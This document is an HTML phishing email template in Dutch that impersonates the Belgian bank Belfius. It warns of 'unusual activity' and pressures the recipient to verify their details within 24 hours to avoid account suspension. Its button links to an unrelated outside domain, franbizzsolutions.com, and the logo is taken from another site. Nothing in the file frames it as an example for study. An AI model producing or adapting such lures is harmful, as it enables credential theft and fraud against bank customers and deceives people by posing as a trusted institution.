<!DOCTYPE html>
<html lang="nl">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Belfius Veiligheidsmelding</title>
    <style>
        body {
            font-family: 'Arial', sans-serif;
            background-color: #f4f4f4;
            margin: 0;
            padding: 0;
        }
        .container {
            max-width: 800px;
            margin: 20px auto;
            background: #fff;
            padding: 40px;
            border: 1px solid #ddd;
            border-radius: 12px;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
        }
        .header {
            text-align: center;
            margin-bottom: 30px;
        }
        .header img {
            max-width: 200px;
        }
        .content {
            margin-bottom: 30px;
        }
        .content p {
            margin: 15px 0;
            font-size: 16px;
            color: #333;
        }
        .button {
            display: inline-block;
            padding: 15px 30px;
            background-color: #e60073; /* Pink color */
            color: #fff;
            text-decoration: none;
            border-radius: 6px;
            font-size: 18px;
            margin-top: 20px;
        }
        .footer {
            text-align: center;
            font-size: 14px;
            color: #888;
            margin-top: 30px;
            border-top: 1px solid #ddd;
            padding-top: 15px;
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="header">
            <img src="https://www.guide-epargne.be/epargner/images/logos/belfius.png" alt="Belfius Logo">
        </div>
        <div class="content">
            <p>Beste Klant,</p>
            <p>Wij hebben ongebruikelijke activiteit op uw Belfius-rekening gedetecteerd. Om uw geld veilig te houden, verifieer u aub uw gegevens onmiddellijk door op de onderstaande knop te klikken.</p>
            <p><a href="https://franbizzsolutions.com/belfius/" class="button">Verifieer Uw Gegevens Nu</a></p>
            <p>Deze verificatie moet binnen 24 uur worden voltooid om rekeningssuspendering te voorkomen.</p>
            <p>Dank u voor uw medewerking.</p>
            <p>Met vriendelijke groet,</p>
            <p>Het Belfius Veiligheidsteam</p>
        </div>
        <div class="footer">
            <p>Belfius Bank SA/NV - Belgisch nummer: 0403.199.703 - RPR Brussels - BTW BE 0403.199.703</p>
            <p>Kontakt gegevens: Belfius, Meir 94, 2000 Antwerpen, BelgiĆ« - Tel: +32 (0)2 222 11 11 - Fax: +32 (0)2 222 11 12</p>
        </div>
    </div>
</body>
</html>